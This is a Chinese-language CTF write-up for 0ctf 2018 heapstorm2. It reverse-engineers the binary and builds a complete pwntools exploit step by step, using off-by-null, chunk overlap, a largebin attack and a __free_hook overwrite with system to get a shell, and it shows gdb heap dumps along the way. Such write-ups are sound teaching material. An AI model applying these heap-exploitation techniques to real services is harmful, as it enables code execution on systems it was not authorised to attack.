0ctf_2018_heapstorm2

Largebin attack + Unlink + off-by-null + overlap + 修改 hook 表 + mmap

1774499292110-5eeb8fbc-b56b-4a4d-81e1-73a5884332e1.png 1774499579948-dda08602-7c1c-458e-8aa6-5f84b7c2361a.png

总体分析整个程序

整个程序包括 Allocate,Update,Delete 和 View 四个部分。在 main 函数的开头,先是调用 mallopt()函数关闭了 fastbin 的分配,然后调用了 mmap()在地址 0x13370000 处分配了一块 0x1000 大小的内存,用于保存堆块结构体。随后,在从 0x13370800 的内存中开始写入随机数,后面是两个异或函数,相当于加了层混淆。

1774501954466-91a1b641-c5c0-4a32-9668-018b2df6d059.png

这里构造了一个结构体:

1
2
3
4
struct heap_info{
    __int64 addr;      // 0x00
    __int64 size;      // 0x08
} heap__info;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  __int64 v4; // [rsp+8h] [rbp-8h]

  v4 = sub_BE6();
  while ( 1 )
  {
    menu(a1, a2);
    switch ( atol_0() )
    {
      case 1LL:
        a1 = v4;
        allocate(v4);
        break;
      case 2LL:
        a1 = v4;
        update(v4);
        break;
      case 3LL:
        a1 = v4;
        delete(v4);
        break;
      case 4LL:
        a1 = v4;
        view(v4);
        break;
      case 5LL:
        return 0;
      default:
        continue;
    }
  }
}

一个安全读取函数:

1
2
3
4
5
6
7
8
9
__int64 atol_0()
{
  char nptr[8]; // [rsp+0h] [rbp-10h] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  sub_1402((__int64)nptr, 8);                   // 安全读取
  return atol(nptr);
}

看主要的函数吧:

Allocate

1
2
3
void *calloc(size_t nmemb, size_t size);
nmemb: 元素个数
size:  元素大小
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
void __fastcall allocate(_QWORD *a1)
{
    int n15; // [rsp+10h] [rbp-10h]
    int size; // [rsp+14h] [rbp-Ch]
    void *v3; // [rsp+18h] [rbp-8h]

    for ( n15 = 0; n15 <= 15; ++n15 )
    {
        if ( !size_XOR((__int64)a1, a1[2 * n15 + 5]) )
        {
            printf("Size: ");
            size = atol_0();
            if ( size > 12 && size <= 4096 )    // 设置大小
            {
                v3 = calloc(size, 1u);
                if ( !v3 )
                    exit(-1);
                a1[2 * n15 + 5] = size_XOR((__int64)a1, size);
                a1[2 * n15 + 4] = addr_XOR(a1, (__int64)v3);
                printf("Chunk %d Allocated\n", n15);
            }
            else
            {
                puts("Invalid Size");
            }
            return;
        }
    }
}

Update

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
int __fastcall update(_QWORD *a1)
{
    signed int n0x10; // [rsp+10h] [rbp-20h]
    int v3; // [rsp+14h] [rbp-1Ch]
    __int64 v4; // [rsp+18h] [rbp-18h]

    printf("Index: ");
    n0x10 = atol_0();
    if ( (unsigned int)n0x10 >= 0x10 || !size_XOR((__int64)a1, a1[2 * n0x10 + 5]) )
        return puts("Invalid Index");
    printf("Size: ");
    v3 = atol_0();
    if ( v3 <= 0 || v3 > (unsigned __int64)(size_XOR((__int64)a1, a1[2 * n0x10 + 5]) - 12) )
        return puts("Invalid Size");
    printf("Content: ");
    v4 = addr_XOR(a1, a1[2 * n0x10 + 4]);
    sub_1377(v4, v3);
    strcpy((char *)(v3 + v4), "HEAPSTORM_II");
    return printf("Chunk %d Updated\n", n0x10);
}

整个函数是更新堆块内容的,不过存在 strcpy 函数会造成 off-by-null 漏洞,最后一位一定是 \x00。

Delete

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int __fastcall delete(_QWORD *a1)
{
    void *ptr; // rax
    signed int n0x10; // [rsp+1Ch] [rbp-4h]

    printf("Index: ");
    n0x10 = atol_0();
    if ( (unsigned int)n0x10 >= 0x10 || !size_XOR((__int64)a1, a1[2 * n0x10 + 5]) )
        return puts("Invalid Index");
    ptr = (void *)addr_XOR(a1, a1[2 * n0x10 + 4]);
    free(ptr);
    a1[2 * n0x10 + 4] = addr_XOR(a1, 0);
    a1[2 * n0x10 + 5] = size_XOR((__int64)a1, 0);
    return printf("Chunk %d Deleted\n", n0x10);
}

这里就是简单的 free,然后通过异或运算把指针变为 0,不存在 UAF

view

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
int __fastcall view(_QWORD *a1)
{
    __int64 v2; // rbx
    __int64 v3; // rax
    signed int n0x10; // [rsp+1Ch] [rbp-14h]

    if ( (a1[3] ^ a1[2]) != 322401073 )
        return puts("Permission denied");
    printf("Index: ");
    n0x10 = atol_0();
    if ( (unsigned int)n0x10 >= 0x10 || !size_XOR((__int64)a1, a1[2 * n0x10 + 5]) )
        return puts("Invalid Index");
    printf("Chunk[%d]: ", n0x10);
    v2 = size_XOR((__int64)a1, a1[2 * n0x10 + 5]);
    v3 = addr_XOR(a1, a1[2 * n0x10 + 4]);
    sub_14D4(v3, v2);
    return puts(s_);
}

直接打印 printf。

View(sub_11B5)——权限检查:a1[3] ^ a1[2]) != 322401073

也就是:

  • 需要让 heaparray+0x10 和 heaparray+0x18 的 xor 等于 0x13377331 才能 view。
    exp 最终会把 heaparray 里的关键字段改成:
  • heaparray[0x10] = 0x13377331
  • heaparray[0x18] = 0 或类似组合(总之 xor 结果等于 0x13377331),来获得 View 权限。

exp 思路:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#coding=utf-8
from pwn import *
context.update(arch='amd64',os='linux',log_level="DEBUG")
# context.terminal = ['tmux','split','-h']
debug = 0
p = process('./heapstorm2')
#p = process(["./heapstorm2"],env={"LD_PRELOAD":'./libc-2.24.so'})
elf = ELF('./heapstorm2')
libc = ELF('/home/kali/Desktop/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
def debug():
        gdb.attach(p)
        pause()


def add(size):
        p.sendlineafter(b'Command: ',b'1')
        p.sendlineafter(b'Size: ',str(size).encode())
        
def edit(index, content):
        p.sendlineafter(b'Command: ',b'2')
        p.sendlineafter(b'Index: ',str(index).encode())
        p.sendlineafter(b'Size: ',str(len(content)).encode())
        p.sendlineafter(b'Content: ',content)

def delete(index):
        p.sendlineafter(b'Command: ',b'3')
        p.sendlineafter(b'Index: ',str(index).encode())

def view(index):
        p.sendlineafter(b'Command: ',b'4')
        p.sendlineafter(b'Index: ',str(index).encode())

add(0x18)  #0
add(0x508) #1
add(0x18)  #2

add(0x18)  #3
add(0x508) #4
add(0x18)  #5
add(0x18)  #6

debug()

p.interactive()
1774527649280-9e1d2389-b8d1-4c9d-88ea-20fc5d504110.png 
1
2
3
4
5
6
7
8
9
pwndbg> x/50gx 0x55a6a53e8000
0x55a6a53e8000: 0x0000000000000000      0x0000000000000021 ==> chunk0
0x55a6a53e8010: 0x0000000000000000      0x0000000000000000 
0x55a6a53e8020: 0x0000000000000000      0x0000000000000511 ==> chunk1
0x55a6a53e8030: 0x0000000000000000      0x0000000000000000
0x55a6a53e8040: 0x0000000000000000      0x0000000000000000
0x55a6a53e8050: 0x0000000000000000      0x0000000000000000
...

1
2
3
edit(1,b'a'*0x4f0 + p64(0x500))    # fake_prev_size
edit(4,b'b'*0x4f0 + p64(0x500))    # fake_prev_size
debug()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
────────────────────────────────────────────────────────────────────────────────                                                                                                                                                                                                                                                                                                                           
pwndbg> heap
pwndbg will try to resolve the heap symbols via heuristic now since we cannot resolve the heap via the debug symbols.
This might not work in all cases. Use `help set resolve-heap-via-heuristic` for more details.                                                                                   
                                                                                                                                                                                
Allocated chunk | PREV_INUSE
Addr: 0x558a9fe41000
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x558a9fe41020
Size: 0x510 (with flag bits: 0x511)

Allocated chunk | PREV_INUSE
Addr: 0x558a9fe41530
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x558a9fe41550
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x558a9fe41570
Size: 0x510 (with flag bits: 0x511)

Allocated chunk | PREV_INUSE
Addr: 0x558a9fe41a80
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x558a9fe41aa0
Size: 0x20 (with flag bits: 0x21)

Top chunk | PREV_INUSE
Addr: 0x558a9fe41ac0
Size: 0x20540 (with flag bits: 0x20541)

pwndbg> x/50gx 0x558a9fe41000
0x558a9fe41000: 0x0000000000000000      0x0000000000000021 ==>chunk0
0x558a9fe41010: 0x0000000000000000      0x0000000000000000
0x558a9fe41020: 0x0000000000000000      0x0000000000000511 ==>chunk1
0x558a9fe41030: 0x6161616161616161      0x6161616161616161
0x558a9fe41040: 0x6161616161616161      0x6161616161616161
...
0x558a9fe41500: 0x6161616161616161      0x6161616161616161
0x558a9fe41510: 0x6161616161616161      0x6161616161616161
0x558a9fe41520: 0x0000000000000500      0x524f545350414548
0x558a9fe41530: 0x0000000049495f4d      0x0000000000000021 ==>chunk2
0x558a9fe41540: 0x0000000000000000      0x0000000000000000
0x558a9fe41550: 0x0000000000000000      0x0000000000000021
0x558a9fe41560: 0x0000000000000000      0x0000000000000000
0x558a9fe41570: 0x0000000000000000      0x0000000000000511
0x558a9fe41580: 0x6262626262626262      0x6262626262626262
0x558a9fe41590: 0x6262626262626262      0x6262626262626262
0x558a9fe415a0: 0x6262626262626262      0x6262626262626262
0x558a9fe415b0: 0x6262626262626262      0x6262626262626262

1

1
2
3
delete(1) #1
edit(0,b'a'*(0x18-12))
debug()
1774528357082-fcc33391-b88a-406c-bc88-0dda239435c2.png 
1
2
3
4
5
6
7
8
9
10
pwndbg> bins
fastbins
empty
unsortedbin
all: 0x563fc4b4f020 chunk1 —▸ 0x7f45519c3b78 ◂— 0x563fc4b4f020
smallbins
empty
largebins
empty

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
pwndbg> x/500gx 0x563fc4b4f000
0x563fc4b4f000: 0x0000000000000000      0x0000000000000021 ==>chunk0
0x563fc4b4f010: 0x6161616161616161      0x5041454861616161
0x563fc4b4f020: 0x49495f4d524f5453      0x0000000000000500| ==>chunk1 [free]
                                        off-by-null修改511的最低位为 \x00
0x563fc4b4f030: 0x00007f45519c3b78      0x00007f45519c3b78|
0x563fc4b4f040: 0x0000000000000000      0x0000000000000000|
0x563fc4b4f050: 0x6161616161616161      0x6161616161616161|
...                                                       |
0x563fc4b4f4d0: 0x6161616161616161      0x6161616161616161| 
0x563fc4b4f4e0: 0x6161616161616161      0x6161616161616161|
0x563fc4b4f4f0: 0x6161616161616161      0x6161616161616161|
0x563fc4b4f500: 0x6161616161616161      0x6161616161616161|
0x563fc4b4f510: 0x6161616161616161      0x6161616161616161|
0x563fc4b4f520: 0x0000000000000500      0x524f545350414548|
0x563fc4b4f530: 0x0000000000000510==>prev_size      0x0000000000000020 ==>chunk2
0x563fc4b4f540: 0x0000000000000000      0x0000000000000000
0x563fc4b4f550: 0x0000000000000000      0x0000000000000021 ==>hunk3
0x563fc4b4f560: 0x0000000000000000      0x0000000000000000
0x563fc4b4f570: 0x0000000000000000      0x0000000000000511
0x563fc4b4f580: 0x6262626262626262      0x6262626262626262
0x563fc4b4f590: 0x6262626262626262      0x6262626262626262

创建两个堆块,chunk1 用于与 chunk2 合并制造重叠,chunk7 是被重叠的块。依次释放 chunk1 和 chunk2 触发 unlink。

1
2
3
4
5
6
add(0x18)  #1
add(0x4d8) #7       --> 0x18 + 0x4d8 = 0x500

delete(1)
delete(2)  # unlink & overlap
debug()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
pwndbg> heap                                                                                                                                                                                                                                                                                                                                                                                               
Allocated chunk | PREV_INUSE                                                                                                                                                                                                                                                                                                                                                                               
Addr: 0x564ad863d000                                                                                                                                                                                                              
Size: 0x20 (with flag bits: 0x21)                                                                                                                                                                                                 
                                                                                                                                                                                                                                  
Free chunk (unsortedbin) | PREV_INUSE                                                                                                                                                                                             
Addr: 0x564ad863d020                                                                                                                                                                                                              
Size: 0x530 (with flag bits: 0x531)                                                                                                                                                                                               
fd: 0x7fe9161c3b78                                                                                                                                                                                                                
bk: 0x7fe9161c3b78                                      

pwndbg> x/50gx 0x564ad863d020   
0x564ad863d020: 0x49495f4d524f5453      0x0000000000000531
0x564ad863d030: 0x00007fe9161c3b78      0x00007fe9161c3b78
0x564ad863d040: 0x0000000000000000      0x0000000000000000
0x564ad863d050: 0x0000000000000000      0x0000000000000000
0x564ad863d060: 0x0000000000000000      0x0000000000000000
0x564ad863d070: 0x0000000000000000      0x0000000000000000
0x564ad863d080: 0x0000000000000000      0x0000000000000000
0x564ad863d090: 0x0000000000000000      0x0000000000000000
0x564ad863d0a0: 0x0000000000000000      0x0000000000000000
0x564ad863d0b0: 0x0000000000000000      0x0000000000000000
0x564ad863d0c0: 0x0000000000000000      0x0000000000000000
0x564ad863d0d0: 0x0000000000000000      0x0000000000000000
0x564ad863d0e0: 0x0000000000000000      0x0000000000000000
0x564ad863d0f0: 0x0000000000000000      0x0000000000000000

这里造成了堆重叠,让两个 free 掉的 bin 合并,大小为 0x530

再重新创建 chunk1,其范围可以覆盖 chunk7 的头部

1
2
3
add(0x38)  #1
add(0x4e8) #2
debug()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
pwndbg> heap
pwndbg will try to resolve the heap symbols via heuristic now since we cannot resolve the heap via the debug symbols.
This might not work in all cases. Use `help set resolve-heap-via-heuristic` for more details.                                                                                                                      
                                                                                                                                                                                                                   
Allocated chunk | PREV_INUSE
Addr: 0x55641cf41000
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x55641cf41020
Size: 0x40 (with flag bits: 0x41)

Allocated chunk | PREV_INUSE
Addr: 0x55641cf41060
Size: 0x4f0 (with flag bits: 0x4f1)

Allocated chunk | PREV_INUSE
Addr: 0x55641cf41550
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x55641cf41570
Size: 0x510 (with flag bits: 0x511)

Allocated chunk | PREV_INUSE
Addr: 0x55641cf41a80
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x55641cf41aa0
Size: 0x20 (with flag bits: 0x21)

Top chunk | PREV_INUSE
Addr: 0x55641cf41ac0
Size: 0x20540 (with flag bits: 0x20541)

pwndbg> x/80gx 0x55641cf41000
0x55641cf41000: 0x0000000000000000      0x0000000000000021 ==> chunk0
0x55641cf41010: 0x6161616161616161      0x5041454861616161
0x55641cf41020: 0x49495f4d524f5453      0x0000000000000041 ==> chunk1
0x55641cf41030: 0x0000000000000000      0x0000000000000000
0x55641cf41040: 0x0000000000000000      0x0000000000000000 ==> chunk7 [overlap]
0x55641cf41050: 0x0000000000000000      0x0000000000000000
0x55641cf41060: 0x0000000000000000      0x00000000000004f1 ==> chunk2
0x55641cf41070: 0x0000000000000000      0x0000000000000000
0x55641cf41080: 0x0000000000000000      0x0000000000000000
0x55641cf41090: 0x0000000000000000      0x0000000000000000
0x55641cf410a0: 0x0000000000000000      0x0000000000000000
0x55641cf410b0: 0x0000000000000000      0x0000000000000000
...
0x55641cf41530: 0x0000000000000000      0x0000000000000000
0x55641cf41540: 0x0000000000000000      0x0000000000000000
0x55641cf41550: 0x0000000000000000      0x0000000000000021 ==> chunk3
0x55641cf41560: 0x0000000000000000      0x0000000000000000
0x55641cf41570: 0x0000000000000000      0x0000000000000511 ==> chunk4
0x55641cf41580: 0x6262626262626262      0x6262626262626262
0x55641cf41590: 0x6262626262626262      0x6262626262626262
0x55641cf415a0: 0x6262626262626262      0x6262626262626262

利用同样方法重叠堆块 8

1
2
3
4
5
6
7
8
9
10
11
delete(4)  #4
edit(3,b'b'*(0x18-12))

add(0x18)  #4
add(0x4d8) #8

delete(4)
delete(5)

add(0x48)  #4
# debug()

清空 unsortedbin 并把 chunk2 单独放入 unsortedbin 当中

1
2
3
delete(2)
add(0x4e8) #6
delete(2)
1774530230570-b7927451-edc2-44df-b0d2-10c9be9108f3.png

现在有两个 bin 块,并且我们最后释放了 chunk2 到 unsortedbin 当中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
pwndbg> x/500gx 0x5591bc3d6000
0x5591bc3d6000: 0x0000000000000000      0x0000000000000021 ==> chunk0
0x5591bc3d6010: 0x6161616161616161      0x5041454861616161 
0x5591bc3d6020: 0x49495f4d524f5453      0x0000000000000041 ==> chunk1
0x5591bc3d6030: 0x0000000000000000      0x0000000000000000
0x5591bc3d6040: 0x0000000000000000      0x0000000000000000 ==> chunk7 [overlap]
0x5591bc3d6050: 0x0000000000000000      0x0000000000000000
0x5591bc3d6060: 0x0000000000000000      0x00000000000004f1 ==> chunk2 unsortedbin [free]
0x5591bc3d6070: 0x00007f91db5c3b78      0x00007f91db5c3b78
0x5591bc3d6080: 0x0000000000000000      0x0000000000000000
...
0x5591bc3d6520: 0x0000000000000000      0x0000000000000000
0x5591bc3d6530: 0x0000000000000000      0x0000000000000000
0x5591bc3d6540: 0x0000000000000000      0x0000000000000000
0x5591bc3d6550: 0x00000000000004f0      0x0000000000000020 ==> chunk3
0x5591bc3d6560: 0x6262626262626262      0x5041454862626262
0x5591bc3d6570: 0x49495f4d524f5453      0x0000000000000051 ==> chunk4
0x5591bc3d6580: 0x0000000000000000      0x0000000000000000
0x5591bc3d6590: 0x0000000000000000      0x0000000000000000 ==> chunk8 [overlap]
0x5591bc3d65a0: 0x0000000000000000      0x0000000000000000
0x5591bc3d65b0: 0x0000000000000000      0x0000000000000000
0x5591bc3d65c0: 0x0000000000000000      0x00000000000004e1 ==> largebin [free]
0x5591bc3d65d0: 0x00007f91db5c3f98      0x00007f91db5c3f98
0x5591bc3d65e0: 0x00005591bc3d65c0      0x00005591bc3d65c0
0x5591bc3d65f0: 0x0000000000000000      0x0000000000000000
0x5591bc3d6600: 0x0000000000000000      0x0000000000000000
0x5591bc3d6610: 0x0000000000000000      0x0000000000000000
...
0x5591bc3d6a50: 0x0000000000000000      0x0000000000000000
0x5591bc3d6a60: 0x0000000000000000      0x0000000000000000
0x5591bc3d6a70: 0x0000000000000000      0x524f545350414549
0x5591bc3d6a80: 0x0000000000000510      0x0000000000000020 ==> chunk5
0x5591bc3d6a90: 0x0000000000000000      0x0000000000000000
0x5591bc3d6aa0: 0x00000000000004e0      0x0000000000000020 ==> chunk6
0x5591bc3d6ab0: 0x0000000000000000      0x0000000000000000
0x5591bc3d6ac0: 0x0000000000000000      0x0000000000020541 ==> top_chunk
0x5591bc3d6ad0: 0x0000000000000000      0x0000000000000000

伪造堆块

利用 chunk7 修改 chunk2 的 bk 指针,使其指向 mmap 区域的 fake_chunk,利用 chunk8 修改 largebin 的 bk 和 bk_nextsize 指针。先看一下修改前的:

1
2
3
4
5
6
7
8
9
10
pwndbg> x/500gx 0x5591bc3d6000
0x5591bc3d6000: 0x0000000000000000      0x0000000000000021 ==> chunk0
0x5591bc3d6010: 0x6161616161616161      0x5041454861616161 
0x5591bc3d6020: 0x49495f4d524f5453      0x0000000000000041 ==> chunk1
0x5591bc3d6030: 0x0000000000000000      0x0000000000000000
0x5591bc3d6040: 0x0000000000000000      0x0000000000000000 ==> chunk7 [overlap]
0x5591bc3d6050: 0x0000000000000000      0x0000000000000000
0x5591bc3d6060: 0x0000000000000000      0x00000000000004f1 ==> chunk2 unsortedbin [free]
0x5591bc3d6070: 0x00007f91db5c3b78      0x00007f91db5c3b78
0x5591bc3d6080: 0x0000000000000000      0x0000000000000000
1
2
3
4
5
heaparray = 0x13370000 + 0x800
fake_chunk = heaparray - 0x20
payload1 = b'a' * 0x10 + p64(0) + p64(0x4f1) + p64(0) + p64(fake_chunk)
edit(7,payload1)
debug()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x560e64cba060
Size: 0x4f0 (with flag bits: 0x4f1)
fd: 0x00
bk: 0x133707e0

pwndbg> x/50gx 0x560e64cba020
0x560e64cba020: 0x49495f4d524f5453      0x0000000000000041 ==> chunk0
0x560e64cba030: 0x0000000000000000      0x0000000000000000
0x560e64cba040: 0x0000000000000000      0x0000000000000000 ==> chunk7 [overlap]
0x560e64cba050: 0x6161616161616161      0x6161616161616161
0x560e64cba060: 0x0000000000000000      0x00000000000004f1 ==> unsortedbin
0x560e64cba070: 0x0000000000000000      0x00000000133707e0 ==> fd = fake_chunk
0x560e64cba080: 0x524f545350414548      0x0000000049495f4d
0x560e64cba090: 0x0000000000000000      0x0000000000000000
0x560e64cba0a0: 0x0000000000000000      0x0000000000000000
0x560e64cba0b0: 0x0000000000000000      0x0000000000000000
0x560e64cba0c0: 0x0000000000000000      0x0000000000000000
0x560e64cba0d0: 0x0000000000000000      0x0000000000000000

同理修改largebin 的 bk 和 bk_nextsize 指针:

1
2
3
4
payload2 = b'b' * 0x20 + p64(0) + p64(0x4e1) + p64(0) + p64(fake_chunk+8)
payload2 += p64(0) + p64(fake_chunk - 0x18 - 5)
edit(8,payload2)
debug()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
Free chunk (largebins) | PREV_INUSE
Addr: 0x5626032bd5c0
Size: 0x4e0 (with flag bits: 0x4e1)
fd: 0x00
bk: 0x133707e8
fd_nextsize: 0x00
bk_nextsize: 0x133707c3

Allocated chunk
Addr: 0x5626032bdaa0
Size: 0x20 (with flag bits: 0x20)

Top chunk | PREV_INUSE
Addr: 0x5626032bdac0
Size: 0x20540 (with flag bits: 0x20541)

pwndbg> x/60gx 0x5626032bd570
0x5626032bd570: 0x49495f4d524f5453      0x0000000000000051 ==> chunk4
0x5626032bd580: 0x0000000000000000      0x0000000000000000
0x5626032bd590: 0x0000000000000000      0x0000000000000000 ==> chunk8
0x5626032bd5a0: 0x6262626262626262      0x6262626262626262
0x5626032bd5b0: 0x6262626262626262      0x6262626262626262
0x5626032bd5c0: 0x0000000000000000      0x00000000000004e1 ==> largebin
0x5626032bd5d0: 0x0000000000000000      0x00000000133707e8 ==> bk
0x5626032bd5e0: 0x0000000000000000      0x00000000133707c3 ==> bk_nextsize
0x5626032bd5f0: 0x524f545350414548      0x0000000049495f4d
0x5626032bd600: 0x0000000000000000      0x0000000000000000

在 fakechunk 处创建一个 0x50 大小的堆块

我们可以在 fakechunk 处创建一个 0x50 大小的堆块,达到完全控制堆块指针的目的。为了满足 mmap 的检查,需要满足地址以 0x56 开头。但由于开启了 ASLR,这种攻击方法只有一定的成功概率

准备一个“可控数据块”当作后续伪结构容器

1
add(0x48) #2

这里是直接复用了 unsortedbin

  1. 2
1
2
payload3= p64(0)*5 + p64(0x13377331) + p64(heaparray)
edit(2,payload3)
1774593058979-8ccfdb79-c7b4-4d14-abac-63ff9ce4197d.png 
1
2
3
4
payload4 = p64(0)*3 + p64(0x13377331) + p64(heaparray)
payload4 += p64(0x1000) + p64(heaparray - 0x20 + 3) + p64(8)
edit(0, payload4)
debug()
1774593320565-3365cc31-cb56-45bf-a31c-5183518c409f.png 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
pwndbg> x/50gx 0x133707e0
0x133707e0:     0x516e652060000000      0x0000000000000056
0x133707f0:     0x0000000000000000      0x0000000000000000
0x13370800:     0x0000000000000000      0x0000000000000000
0x13370810:     0x0000000000000000      0x0000000013377331
0x13370820:     0x0000000013370800      0x0000000000001000
0x13370830:     0x00000000133707e3      0x0000000000000008
0x13370840:     0x524f545350414548      0x1178fe0049495f4d
0x13370850:     0x289cab164ce21d16      0x1178fe00b49289fd
0x13370860:     0x289cab164ce21df6      0x1178fe00b49289ad
0x13370870:     0x289cfd4722873876      0x1178fe00b49289e5
0x13370880:     0x289cab164ce212c6      0x1178fe00b49289fd
0x13370890:     0x289cab164ce21826      0x1178fe00b4928d3d
0x133708a0:     0x289cab164ce21dd6      0x1178fe00b4928d3d
0x133708b0:     0x289cfd4722873876      0x1178fe00b49289e5
0x133708c0:     0x289cfd4722873876      0x1178fe00b49289e5
0x133708d0:     0x289cfd4722873876      0x1178fe00b49289e5

泄露出heap指针

1
2
3
4
view(1)
p.recvuntil(b']: ')
chunk = u64(p.recv(8))
log.success('chunk -> {}'.format(hex(chunk)))

同样的方法来把任意读地址改成 chunk+0x10,泄漏 libc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
#coding=utf-8
from pwn import *
# context.update(arch='amd64',os='linux',log_level="DEBUG")
# context.terminal = ['tmux','split','-h']
p = process('./heapstorm2')
# p = remote('node5.buuoj.cn',27883)
# p = process(["./heapstorm2"],env={"LD_PRELOAD":'./libc-2.24.so'})
elf = ELF('./heapstorm2')
libc = ELF('/home/kali/Desktop/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
# libc = ELF('./x64libc-2.23.so')
def debug():
        gdb.attach(p)
        pause()


def add(size):
        p.sendlineafter(b'Command: ',b'1')
        p.sendlineafter(b'Size: ',str(size).encode())
        
def edit(index, content):
        p.sendlineafter(b'Command: ',b'2')
        p.sendlineafter(b'Index: ',str(index).encode())
        p.sendlineafter(b'Size: ',str(len(content)).encode())
        p.sendlineafter(b'Content: ',content)

def delete(index):
        p.sendlineafter(b'Command: ',b'3')
        p.sendlineafter(b'Index: ',str(index).encode())

def view(index):
        p.sendlineafter(b'Command: ',b'4')
        p.sendlineafter(b'Index: ',str(index).encode())

add(0x18)  #0
add(0x508) #1
add(0x18)  #2
add(0x18)  #3
add(0x508) #4
add(0x18)  #5
add(0x18)  #6
# debug()

edit(1,b'a'*0x4f0 + p64(0x500))    # fake_prev_size
edit(4,b'b'*0x4f0 + p64(0x500))    # fake_prev_size
# debug()

delete(1) #1
edit(0,b'a'*(0x18-12))
# debug()


add(0x18)  #1
add(0x4d8) #7
delete(1)
delete(2)
# debug()
add(0x38)  #1
add(0x4e8) #2
# debug()

delete(4)  #4
edit(3,b'b'*(0x18-12))

add(0x18)  #4
add(0x4d8) #8

delete(4)
delete(5)

add(0x48)  #4
# debug()

delete(2)
add(0x4e8) #6
delete(2)
# debug()

heaparray = 0x13370000 + 0x800
fake_chunk = heaparray - 0x20
payload1 = b'a' * 0x10 + p64(0) + p64(0x4f1) + p64(0) + p64(fake_chunk)
edit(7,payload1)
# debug()
payload2 = b'b' * 0x20 + p64(0) + p64(0x4e1) + p64(0) + p64(fake_chunk+8)
payload2 += p64(0) + p64(fake_chunk - 0x18 - 5)
edit(8,payload2)
# debug()

add(0x48)#2
payload3 = p64(0)*5 + p64(0x13377331) + p64(heaparray)
edit(2,payload3)
# debug()
payload4 = p64(0)*3 + p64(0x13377331) + p64(heaparray)
payload4 += p64(0x1000) + p64(heaparray - 0x20 + 3) + p64(8)
edit(0, payload4)
debug()

view(1)
p.recvuntil(b']: ')
chunk = u64(p.recv(8))
log.success('chunk -> {}'.format(hex(chunk)))

chunk_fd = chunk + 0x10

payload5 = p64(0)*3 + p64(0x13377331) + p64(heaparray)
payload5 += p64(0x1000) + p64(chunk_fd) + p64(8)
edit(0,payload5)

view(1)
p.recvuntil(b']: ')
libc_base = u64(p.recv(8)) - 0x68 - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
log.success('libc_base -> {}'.format(hex(libc_base)))

payload = p64(0) * 4 + p64(heaparray) + p64(0x1000) + p64(free_hook) + p64(8 + 12)
payload += p64(heaparray + 0x48) + b'/bin/sh\x00'
edit(0, payload)
edit(1, p64(system))

delete(2)

p.interactive()


更新: 2026-03-30 17:53:37
原文: https://www.yuque.com/idcm/wnemg9/psamt9qti7rw9vup